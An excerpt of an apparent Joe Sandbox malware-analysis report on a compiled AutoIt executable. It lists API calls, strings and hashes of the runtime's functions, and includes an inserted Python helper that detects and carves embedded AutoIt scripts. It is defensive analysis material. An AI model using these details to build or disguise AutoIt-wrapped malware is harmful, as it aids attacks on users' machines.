                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                  • String ID: *.*
                                                                  • API String ID: 34673085-438819550
                                                                  • Opcode ID: 53dd1799be9582c97d045cb597dbd636cccbc25e0814ed46f8da6da79060d595
                                                                  • Instruction ID: ecdd74c58de0d89212a61de57dff3855cf002047ff2e3086155c89566be1eb2d
                                                                  • Opcode Fuzzy Hash: 53dd1799be9582c97d045cb597dbd636cccbc25e0814ed46f8da6da79060d595
                                                                  • Instruction Fuzzy Hash: 118191725062459FCB34EF66C854AAAB7E8BF89311F144C2EFC89C7251E634D948CB52
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0097C1FC
                                                                  • GetFocus.USER32 ref: 0097C20C
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0097C217
                                                                  • _memset.LIBCMT ref: 0097C342
                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0097C36D
                                                                  • GetMenuItemCount.USER32(?), ref: 0097C38D
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0097C3A0
                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0097C3D4
                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0097C41C
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0097C454
                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0097C489
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                  • String ID: 0
                                                                  • API String ID: 1296962147-4108050209
                                                                  • Opcode ID: cf07a1dcb64f2b6ff4bc8ddb9cfb99b83d8914cd90968362aecc5694dffb2807
                                                                  • Instruction ID: 01005d19ca77054631d5fd312a2c22f5224d79e0bfa80759f69977717fb3d8cd
                                                                  • Opcode Fuzzy Hash: cf07a1dcb64f2b6ff4bc8ddb9cfb99b83d8914cd90968362aecc5694dffb2807
                                                                  • Instruction Fuzzy Hash: 4C8191B22083059FD710DF24C894A7BBBE8FF88714F00892DF999A72A1D770D945DB52
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0096738F
                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0096739B
                                                                  • CreateCompatibleDC.GDI32(?), ref: 009673A7
                                                                  • SelectObject.GDI32(00000000,?), ref: 009673B4
                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00967408
                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00967444
                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00967468
                                                                  • SelectObject.GDI32(00000006,?), ref: 00967470
                                                                  • DeleteObject.GDI32(?), ref: 00967479
                                                                  • DeleteDC.GDI32(00000006), ref: 00967480
                                                                  • ReleaseDC.USER32(00000000,?), ref: 0096748B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                  • String ID: (
                                                                  • API String ID: 2598888154-3887548279
                                                                  • Opcode ID: e6907e862b9bdab3e152ba430c9b2193db145e583a07aeeb642a474f231d5cf5
                                                                  • Instruction ID: e2ed82b11ce6ba8e00161e0919e75139e8c3ad5ef716e2f801b92cffcd668fab
                                                                  • Opcode Fuzzy Hash: e6907e862b9bdab3e152ba430c9b2193db145e583a07aeeb642a474f231d5cf5
                                                                  • Instruction Fuzzy Hash: 53514876A04309EFCB14CFA9DC84EAEBBB9EF48710F14842AF959A7310C771A940DB50
                                                                  APIs
                                                                    • Part of subcall function 00910957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,008F6B0C,?,00008000), ref: 00910973
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008F6BAD
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 008F6CFA
                                                                    • Part of subcall function 008F586D: _wcscpy.LIBCMT ref: 008F58A5
                                                                    • Part of subcall function 0091363D: _iswctype.LIBCMT ref: 00913645
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 537147316-1018226102
                                                                  • Opcode ID: 4eac46bab49afd217c37243bca34ed9b311be892977cd69dddd57aa623915bab
                                                                  • Instruction ID: 334554a6fd1c4bda2ad242930d325767ef6c394e731cb1619778c2a3befaf596
                                                                  • Opcode Fuzzy Hash: 4eac46bab49afd217c37243bca34ed9b311be892977cd69dddd57aa623915bab
                                                                  • Instruction Fuzzy Hash: ED02AB301083499FC714EF24D891AAFBBE5FF99314F10492DF68A972A1EB31D949CB52
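The string list of the routine above (">>>AUTOIT SCRIPT<<<", "AU3!", "EA06", "#include depth exceeded", "Bad directive syntax error") marks it as the AutoIt interpreter's script loader, which is what the report's "Binary is likely a compiled AutoIt script file" signature keys on: the functions in this module are the AutoIt runtime stub, and the payload of interest is the compiled script it carries. The Python below is an added triage example, not code from the report, from Joe Sandbox or from AutoIt; it scans a binary for those marker strings so a wrapper like this sample can be flagged and the offset of the embedded script located for extraction with a separate AutoIt decompiler. It assumes the two short tags occur back-to-back as "AU3!EA06" in the compiled-script header and that the text marker may be stored as ASCII or UTF-16LE; the sample bytes it scans are constructed, not taken from the sample.

```python
"""Locate AutoIt compiled-script markers in a binary blob (triage helper).

Added example; not part of the sandbox report, Joe Sandbox, or AutoIt.
Marker strings come from the report's string list for the script-loading
routine. Assumptions: the tags are contiguous as b"AU3!EA06" in a compiled
script header, and the text marker may be ASCII or UTF-16LE encoded.
"""
import re
from dataclasses import dataclass

COMPILED_TAG = b"AU3!EA06"            # assumption: "AU3!" immediately followed by "EA06"
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"  # text marker from the report's string list


@dataclass(frozen=True)
class Hit:
    offset: int
    kind: str      # "compiled-header" or "script-marker"
    encoding: str  # "ascii" or "utf-16le"


def find_autoit_markers(blob: bytes) -> list:
    """Return every marker occurrence in blob, sorted by file offset."""
    patterns = [
        (COMPILED_TAG, "compiled-header", "ascii"),
        (SCRIPT_MARKER.encode("ascii"), "script-marker", "ascii"),
        (SCRIPT_MARKER.encode("utf-16le"), "script-marker", "utf-16le"),
    ]
    hits = []
    for needle, kind, enc in patterns:
        for m in re.finditer(re.escape(needle), blob):
            hits.append(Hit(m.start(), kind, enc))
    return sorted(hits, key=lambda h: h.offset)


def looks_like_autoit_wrapper(blob: bytes) -> bool:
    """True when a compiled-script header tag is present anywhere in blob."""
    return any(h.kind == "compiled-header" for h in find_autoit_markers(blob))


def carve_compiled_script(blob: bytes) -> bytes:
    """Return blob from the first compiled-script tag onward (empty if absent).

    This is the slice to hand to a decompiler; the tag itself is kept so the
    consumer can re-validate the header.
    """
    idx = blob.find(COMPILED_TAG)
    return b"" if idx < 0 else blob[idx:]


# Constructed sample: PE-like padding with a UTF-16LE text marker and a
# compiled-script tag embedded. These are not bytes from the analysed file.
SAMPLE = (
    b"MZ" + b"\x00" * 62
    + b"This program cannot be run in DOS mode.\r\n" + b"\x90" * 40
    + SCRIPT_MARKER.encode("utf-16le") + b"\x00" * 8
    + COMPILED_TAG + b"\x01\x02\x03\x04" + b"\x00" * 16
)

if __name__ == "__main__":
    for h in find_autoit_markers(SAMPLE):
        print(f"0x{h.offset:06x}  {h.kind:16s} {h.encoding}")
    print("compiled AutoIt script header present:", looks_like_autoit_wrapper(SAMPLE))
    print("carved script length:", len(carve_compiled_script(SAMPLE)))
```

Run it against a file with `find_autoit_markers(open(path, "rb").read())`. A hit of kind "compiled-header" is the strong indicator; a text marker alone only says the loader's legacy path could be exercised, so treat it as a weaker signal and confirm by carving.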
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952D50
                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00952DDD
                                                                  • GetMenuItemCount.USER32(009B5890), ref: 00952E66
                                                                  • DeleteMenu.USER32(009B5890,00000005,00000000,000000F5,?,?), ref: 00952EF6
                                                                  • DeleteMenu.USER32(009B5890,00000004,00000000), ref: 00952EFE
                                                                  • DeleteMenu.USER32(009B5890,00000006,00000000), ref: 00952F06
                                                                  • DeleteMenu.USER32(009B5890,00000003,00000000), ref: 00952F0E
                                                                  • GetMenuItemCount.USER32(009B5890), ref: 00952F16
                                                                  • SetMenuItemInfoW.USER32(009B5890,00000004,00000000,00000030), ref: 00952F4C
                                                                  • GetCursorPos.USER32(?), ref: 00952F56
                                                                  • SetForegroundWindow.USER32(00000000), ref: 00952F5F
                                                                  • TrackPopupMenuEx.USER32(009B5890,00000000,?,00000000,00000000,00000000), ref: 00952F72
                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00952F7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 3993528054-0
                                                                  • Opcode ID: ff975ee340a32e69b0cec0b1753967d98e9d30e6e905b86f1ef1ad7c9ce14690
                                                                  • Instruction ID: 0db92b52c21536a78b9eb8a89516f91b3327f7e25c270d87cde1e23ee101dd56
                                                                  • Opcode Fuzzy Hash: ff975ee340a32e69b0cec0b1753967d98e9d30e6e905b86f1ef1ad7c9ce14690
                                                                  • Instruction Fuzzy Hash: 7271F671605205BFEB21CF56DC86FAABF68FF46325F100216FA29AA1E0C7715C58DB90
                                                                  APIs
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • _memset.LIBCMT ref: 0094786B
                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009478A0
                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009478BC
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009478D8
                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00947902
                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0094792A
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00947935
                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094793A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                  • API String ID: 1411258926-22481851
                                                                  • Opcode ID: 8117e3638e67010f0db4ea9cc2b791e1a8a00b71ab64e77e7d8b55841ed93028
                                                                  • Instruction ID: 8ae8d3dc194cde19491f3dcb24e14ff83b3be5f2a37d9487a2cf7bba1b1c7630
                                                                  • Opcode Fuzzy Hash: 8117e3638e67010f0db4ea9cc2b791e1a8a00b71ab64e77e7d8b55841ed93028
                                                                  • Instruction Fuzzy Hash: 0041F57281462DAADF15EBA8DC95DFDB778FF18310F404469E905A6261EB305E04CB91
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 3964851224-909552448
• Opcode ID: f8695241aedfdb82877b61edc4d0e849826c1eec0ea7a28944a621496109e394
• Instruction ID: 8531f7f161e5ae30cee538f2dc5a13c264be97a944293a118a1a1928eb6cf4d6
• Opcode Fuzzy Hash: f8695241aedfdb82877b61edc4d0e849826c1eec0ea7a28944a621496109e394
• Instruction Fuzzy Hash: BC41AE3221030ACBCF20EF64D956AEE3BA4FF96300F108414FC595B291DB75999ACBA0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0092E2A0,00000010,?,Bad directive syntax error,0097F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0094F7C2
• LoadStringW.USER32(00000000,?,0092E2A0,00000010), ref: 0094F7C9
  • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
• _wprintf.LIBCMT ref: 0094F7FC
• __swprintf.LIBCMT ref: 0094F81E
• MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0094F88D
Similarity
• API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
• String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
• API String ID: 1506413516-4153970271
• Opcode ID: afd4ad189e3d9ec1c15d96bf21fed66c86f2e40c0e7007eb45f5cc2432554f6a
• Instruction ID: 2ceccd8bca8e285fbf1e2bacf93310a4bbb01f815466bd91cf0fcd9721e478f4
• Opcode Fuzzy Hash: afd4ad189e3d9ec1c15d96bf21fed66c86f2e40c0e7007eb45f5cc2432554f6a
• Instruction Fuzzy Hash: 5C215C3290421EEFDF11AFA0CC1AEFE7739FF18304F044465F615A61A1EA71A658DB51
APIs
  • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
  • Part of subcall function 008F7924: _memmove.LIBCMT ref: 008F79AD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00955330
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00955346
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00955357
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00955369
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0095537A
Similarity
• API ID: SendString$_memmove
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2279737902-1007645807
• Opcode ID: 188a482dae842020a9d777e88f4e9c7b04d444f24efc75d7e6a0820b0f13bea6
• Instruction ID: 9c179991e93f4749c3223b10744a8f58fbb8f7a0d59e669043e15ceee3ef8340
• Opcode Fuzzy Hash: 188a482dae842020a9d777e88f4e9c7b04d444f24efc75d7e6a0820b0f13bea6
• Instruction Fuzzy Hash: 9E116021A5012DB9E724F676CC5ADFFAB7CFBD6B44F000429B905E20E1EEA00D44C6A1
Similarity
• API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 208665112-3771769585
• Opcode ID: a94565e9b18710faf76cc64ea496a6a4d5d66239618bf5a188f799ee073ee58e
• Instruction ID: 1169a5949e81f29d5347c5bc702441d3ac4822951f923cedc3fac21600ec2ebd
• Opcode Fuzzy Hash: a94565e9b18710faf76cc64ea496a6a4d5d66239618bf5a188f799ee073ee58e
• Instruction Fuzzy Hash: 8F1105326041086BCB54EB31EC4AEDA77BCEB86716F0401BAF849A6091EF7189C58B51
APIs
• timeGetTime.WINMM ref: 00954F7A
  • Part of subcall function 0091049F: timeGetTime.WINMM(?,75A4B400,00900E7B), ref: 009104A3
• Sleep.KERNEL32(0000000A), ref: 00954FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00954FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00954FEC
• SetActiveWindow.USER32 ref: 0095500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00955019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00955038
• Sleep.KERNEL32(000000FA), ref: 00955043
• IsWindow.USER32 ref: 0095504F
• EndDialog.USER32(00000000), ref: 00955060
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: f04affe610919feb2a1fc0063f14890986e31995c82a903dcce4b52ecb4a3119
• Instruction ID: ffa05ae792cc37fd1f496259efd8e88eebfe192ab2813fdb27f5def0f0e381ec
• Opcode Fuzzy Hash: f04affe610919feb2a1fc0063f14890986e31995c82a903dcce4b52ecb4a3119
• Instruction Fuzzy Hash: 9921267221C204AFE7209F31ED99B263B6DFB4475AF051028F809911B1CBB5AD94F771
APIs
  • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
  • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
• CoInitialize.OLE32(00000000), ref: 0095D5EA
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0095D67D
• SHGetDesktopFolder.SHELL32(?), ref: 0095D691
• CoCreateInstance.OLE32(00982D7C,00000000,00000001,009A8C1C,?), ref: 0095D6DD
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0095D74C
• CoTaskMemFree.OLE32(?,?), ref: 0095D7A4
• _memset.LIBCMT ref: 0095D7E1
• SHBrowseForFolderW.SHELL32(?), ref: 0095D81D
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0095D840
• CoTaskMemFree.OLE32(00000000), ref: 0095D847
• CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0095D87E
• CoUninitialize.OLE32(00000001,00000000), ref: 0095D880
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
• String ID:
• API String ID: 1246142700-0
• Opcode ID: 6115e488838c6e089d5f203391bad414b5df3b00a9a749a4a3686b13c90b04c1
• Instruction ID: bd87f321b4dfb1ae337c7208ada5af78f207e7c270c4d53d6be6fdb2345bcbab
• Opcode Fuzzy Hash: 6115e488838c6e089d5f203391bad414b5df3b00a9a749a4a3686b13c90b04c1
• Instruction Fuzzy Hash: 86B12E75A00109AFDB14DFA5C888EAEBBB9FF48315F008469F909EB261DB30ED45CB51
APIs
• GetDlgItem.USER32(?,00000001), ref: 0094C283
• GetWindowRect.USER32(00000000,?), ref: 0094C295
• MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0094C2F3
• GetDlgItem.USER32(?,00000002), ref: 0094C2FE
• GetWindowRect.USER32(00000000,?), ref: 0094C310
• MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0094C364
• GetDlgItem.USER32(?,000003E9), ref: 0094C372
• GetWindowRect.USER32(00000000,?), ref: 0094C383
• MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0094C3C6
• GetDlgItem.USER32(?,000003EA), ref: 0094C3D4
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0094C3F1
• InvalidateRect.USER32(?,00000000,00000001), ref: 0094C3FE
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 43975f89d67909ac585fd67943c29343ef852abe9efae3b831b2ef6f84e0a4b2
• Instruction ID: dbb1a61df98a572c20c9d828154ba25cce6e5d61e7ebf76360fdbe4597b492e4
• Opcode Fuzzy Hash: 43975f89d67909ac585fd67943c29343ef852abe9efae3b831b2ef6f84e0a4b2
• Instruction Fuzzy Hash: A35101B1B10205AFDB18CFA9DD99E6DBBB9FB88711F14812DF519E7290D7709D408B10
APIs
  • Part of subcall function 008F1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F2036,?,00000000,?,?,?,?,008F16CB,00000000,?), ref: 008F1B9A
• DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 008F20D3
• KillTimer.USER32(-00000001,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 008F216E
• DestroyAcceleratorTable.USER32(00000000), ref: 0092BCA6
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BCD7
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BCEE
• ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,008F16CB,00000000,?,?,008F1AE2,?,?), ref: 0092BD0A
• DeleteObject.GDI32(00000000), ref: 0092BD1C
Similarity
• API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
• String ID:
• API String ID: 641708696-0
• Opcode ID: 9309e9eabd9852dd386930fa3b12f75c6fa7819a074e9c50bd693e1ad1d87dc2
• Instruction ID: c3481355c01478b37d2e46ed19215ad74201b68134628e9471f46dde16554905
• Opcode Fuzzy Hash: 9309e9eabd9852dd386930fa3b12f75c6fa7819a074e9c50bd693e1ad1d87dc2
• Instruction Fuzzy Hash: F761AF32124A18DFCB359F28DA58B3977F1FF84326F104529E246D66B4CB70A890EF40
APIs
  • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
• GetSysColor.USER32(0000000F), ref: 008F21D3
Similarity
• API ID: ColorLongWindow
• String ID:
• API String ID: 259745315-0
• Opcode ID: 22b5e8a4ce93ae053c7c4ece30ca8f0934c830b5685a86c40be4ce115d94ac11
• Instruction ID: 86043cbac75f52ff8d1a2c5ca4c58559c94c89fb0f2e35000d275c55338f02d4
• Opcode Fuzzy Hash: 22b5e8a4ce93ae053c7c4ece30ca8f0934c830b5685a86c40be4ce115d94ac11
• Instruction Fuzzy Hash: CE41B232108158DBDB215F38EC98BB97BA5FB06331F244265FE65DA1E5C7318C81DB61
APIs
• CharLowerBuffW.USER32(?,?,0097F910), ref: 0095A90B
• GetDriveTypeW.KERNEL32(00000061,009A89A0,00000061), ref: 0095A9D5
• _wcscpy.LIBCMT ref: 0095A9FF
Similarity
• API ID: BuffCharDriveLowerType_wcscpy
• String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 2820617543-1000479233
• Opcode ID: 939743af8f37a3a489d948371f8b28471e3e8b86777936aef80bce33bc9176d9
• Instruction ID: 568d7b0dd216672f1b560f10df52c114640534f9618ddf80c95bc597bfe12ee5
• Opcode Fuzzy Hash: 939743af8f37a3a489d948371f8b28471e3e8b86777936aef80bce33bc9176d9
• Instruction Fuzzy Hash: 1A51BA312083059BC310EF25C8A2AAFB7A9FFC5301F10492DF995972A2DB719949CB93
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __i64tow__itow__swprintf
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 421087845-2263619337
                                                                  • Opcode ID: aa64c7429ae427118b7fada553b554514566a7cc9f070ce7afe32bc7a43d6760
                                                                  • Instruction ID: 4a1e8ff78c109ea0251875e40ac95cc03e3a4d218429d82c7e98e91d0b68506f
                                                                  • Opcode Fuzzy Hash: aa64c7429ae427118b7fada553b554514566a7cc9f070ce7afe32bc7a43d6760
                                                                  • Instruction Fuzzy Hash: 2D41C67161020D9EDB24EF78E852F7677F8FF86304F20447EF589DA295EA7199418710
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0097716A
